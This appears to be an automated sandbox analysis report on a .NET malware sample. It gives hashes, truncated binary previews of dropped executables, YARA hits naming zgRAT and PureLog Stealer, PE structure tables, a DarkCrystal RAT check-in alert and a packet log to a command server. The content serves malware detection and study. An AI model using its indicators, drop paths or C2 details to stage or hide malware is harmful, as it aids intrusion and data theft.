                                                                                                          Category:dropped
                                                                                                          Size (bytes):4608
                                                                                                          Entropy (8bit):3.9694503188712393
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6opjPtqM7Jt8Bs3FJsdcV4MKe27c6lDvqBHGOulajfqXSfbNtm:zP5Pc+Vx9McevkgcjRzNt
                                                                                                          MD5:856585EB7F943E8C4B8ABCAB6734A5C4
                                                                                                          SHA1:386A22AA3D306AC7D19BE82B678741AB0FF6E3F9
                                                                                                          SHA-256:90CE760C79FDBAE1D69CC563400392CFECEA7965C0FC64C5089CF7B5C268657C
                                                                                                          SHA-512:44A4824F3110E39B8BED421F57044E69BEB1D2A6D49033B8E5F214DDB0E4673CB2B4AA967DBDB3DEE61CC38F77CFDEB014AE016DC514F227282458CF626C9AC8
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g.............................'... ...@....@.. ....................................@.................................d'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..<.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55
                                                                                                          Entropy (8bit):5.122002213406651
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vQNRLNH5x0czK24kA0uBimn:oNRL6cmCA0udn
                                                                                                          MD5:1C6D7708BD775C663BB667D96C2540CC
                                                                                                          SHA1:8B0D29D94CED2778D7DC8D97A88698528F7D0B91
                                                                                                          SHA-256:E0CF6B0BA977F3D507CFC3A558305C50FA23609EAB547AF036EB03B8295E955F
                                                                                                          SHA-512:71E00C94E67C7FA7AA79AC1E28092C6743053807180C764236E7389D202F1F433C7B375DAB4DE99AFD5945A8C163D911F12F22A8CE996F89E5FAE3C42A50487C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:VWU0mwsh2FXqZY0s9pHhRdVtL4TetyNBoybNlqZAupQKSeVCUHzXeUv
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):151
                                                                                                          Entropy (8bit):4.802135960853257
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXwVTtQueRuUXuRqEKvoP2Rzvj:Vx993DEUftBFOlE1U
                                                                                                          MD5:3CB46CD919B4DA67498BEE55CA2C32FA
                                                                                                          SHA1:A0312B1927B9A5DB0536B9E52E1C86234E1FA8C7
                                                                                                          SHA-256:0270838532279E245CD0991FFE2E384219CBAEACDF1C5539285458C64981722F
                                                                                                          SHA-512:E95890C13D7FB40986B21F6E54D354D78EA09395D5F2B1A3131473BD050FBF6EEF53A6C2F1A2311E5406FF10A4777D7FF01E81127340D675E68E457503F310B9
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 08/01/2025 12:21:43..12:21:43, error: 0x80072746.12:21:48, error: 0x80072746.
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):3.943483543059487
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          File name:wxl1r0lntg.exe
                                                                                                          File size:11'304'960 bytes
                                                                                                          MD5:55672946ffc3fa0b0c7670bf37d45225
                                                                                                          SHA1:669cba1aad9659aeff1a94b584b0e7ad3acb7c79
                                                                                                          SHA256:386878a415d3edac8530e3b99769b40759bd105e3758b2c68887440e8890ee55
                                                                                                          SHA512:24a9b4461cd2b6942c681a70a9aea88b4715d8f42498ae546453739bae1faab20ce7ec9a248be35141cabc715aaf932a2294bc3fdd228d58fee7fd6e9343e6e7
                                                                                                          SSDEEP:49152:Y7dvDhzETOIntW9y3yP2QAuxQzxEzwYjiwVTkO2kZBtk8hsuIm49DWm/S52LKN1o:
                                                                                                          TLSH:27B6F82439FF501DB3B3AEA95FD8B8EF995EF673270A60A9206103464713D81DD82739
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg.................P... ......^k... ........@.. ....................................@................................
                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                          Entrypoint:0xec6b5e
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6771AB80 [Sun Dec 29 20:05:20 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:v2.0.50727
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac6b100x4b.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xac80000x2c8.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xaca0000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000xac4b640xac5000d323960f8c91b22946a71f0067e90db3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0xac80000x2c80x10002b35e2043eba53d3eb7c3408e7dfe118False0.07958984375data0.723095838056564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0xaca0000xc0x1000452c48e483f5fe4bb6f9adcceaa5ee38False0.0087890625data0.015920183265625623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_VERSION0xac80580x26cdata0.4532258064516129
                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-08T17:12:56.629250+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549853104.21.112.180TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 8, 2025 17:12:55.772223949 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:55.777044058 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:55.777127981 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:55.777849913 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:55.782649994 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:56.133930922 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:56.138773918 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:56.495764017 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:56.629250050 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:56.761533976 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:56.761555910 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:56.761651039 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.501565933 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.508594036 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.603087902 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.603282928 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.608036041 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.773102999 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.777895927 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.778028011 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.778233051 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:57.782979965 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.853785992 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:57.924593925 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.103420973 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.104671001 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.108357906 CET8049853104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.108413935 CET4985380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.109456062 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.109536886 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.109673977 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.114418983 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.129482985 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.134331942 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.134336948 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.134341955 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.223294973 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.316740990 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.453341007 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.457756996 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.462527990 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.462671995 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.519871950 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.563843966 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.629292965 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.833919048 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.903557062 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.903558016 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:58.908416033 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.908613920 CET8049862104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:58.909025908 CET4986280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.000051975 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.000236034 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.005465031 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.005469084 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.005486965 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.375204086 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.441786051 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.835171938 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.836218119 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.840171099 CET8049863104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.840219975 CET4986380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.841048956 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:12:59.841125011 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.841362953 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:12:59.846141100 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.192353010 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:00.197228909 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.197242975 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.197254896 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.304465055 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.396661997 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:00.563951969 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:00.738675117 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.356400013 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.357279062 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.362771034 CET8049874104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.362864971 CET4987480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.364259005 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.364475012 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.364475012 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.369294882 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.724065065 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:01.729686975 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.729701996 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.729712009 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.828187943 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:01.942048073 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.078200102 CET8049881104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.238620043 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.553423882 CET4988880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.558295012 CET8049888104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.558398962 CET4988880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.558707952 CET4988880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.563522100 CET8049888104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.658467054 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.663290977 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.663366079 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.663609982 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.664066076 CET4988180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.666479111 CET4988880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:02.668366909 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.714485884 CET8049888104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.959408045 CET8049888104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:02.959479094 CET4988880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.020422935 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025309086 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025315046 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025365114 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025376081 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025381088 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025391102 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025429964 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025438070 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025440931 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025454044 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025484085 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025491953 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025501966 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025515079 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025531054 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025540113 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025542974 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.025573015 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.025609970 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.030227900 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030242920 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030257940 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030297041 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.030322075 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.030375957 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030388117 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030427933 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.030436039 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.030448914 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.030489922 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.044456959 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.044651031 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.049555063 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049648046 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.049853086 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049865961 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049877882 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049902916 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049915075 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049930096 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049953938 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.049963951 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050004005 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050018072 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050060034 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050071955 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050086021 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050098896 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050108910 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050123930 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050124884 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050137043 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050137997 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050170898 CET8049889104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:03.050177097 CET4988980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:03.050183058 CET8049889104.21.112.1192.168.2.5
